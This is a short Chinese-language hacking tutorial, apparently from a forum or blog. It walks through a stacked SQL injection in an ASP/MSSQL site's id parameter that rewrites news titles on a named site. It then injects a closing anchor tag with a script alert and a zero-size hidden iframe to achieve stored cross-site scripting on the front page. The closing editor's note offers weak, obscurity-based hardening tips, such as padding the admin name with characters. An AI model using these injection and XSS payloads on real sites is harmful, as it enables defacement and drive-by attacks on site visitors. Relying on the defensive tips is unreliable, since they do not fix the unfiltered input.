MSSQL,如果遇到MD5的后台,在不能破解的情况下可以UPDATE ,这里的文章,也是,首页调用文章的标题,我们update 掉的文章标题也是会在再首页显示的。
UPDATE的语法:update 表名 set 字段='''' where 原字段=''xx'',我们把表名和字段,带入语法就OK了。
提交入下注入语句;
http://26836659.blogcn.com/subjoin/corporation/infodetail.asp?id=388'';update+news+set+title=''混世魔王''+where+title=''北京市基本医疗保险规定''--
我已经把网站改成了我BLOG地址.呵呵,随便做个广告.我们来首页看看这段代码。已经修改成功。我这里就不再截图了。
 |
这里只是个连接的,我们可以再改改。如果我们把标题修改成
。在首页显示就是 |
这个<a href= > 给</a> 闭合了。那后面就可以执行N多代码了,先来个<script>alert("******")</script> ****表示要输入的内容。
|
嘿嘿,来刷新一下首页,跨站提示框出来了。我们还可以改成
<iframe src="XXXX" width="0" height="0"> </iframe>嘿嘿,就到这里点到为止,发封mail给管理员吧。
编者语:现在很多网站对程序大意,变量过滤不严格,对于这种情况我们可以对数据库修改表结构;然后修改管理员的账号字段的数据类型,文本型改成最大字段255(其实也够了,如果还想做得再大点,可以选择备注型),密码的字段也进行相同设置。对表进行修改,设置管理员权限的账号放在ID1,并输入大量中文字符(最好大于100个字),把真正的管理员密码放在ID2后的任何一个位置。通过以上的修改,网站的安全会大大的提高。
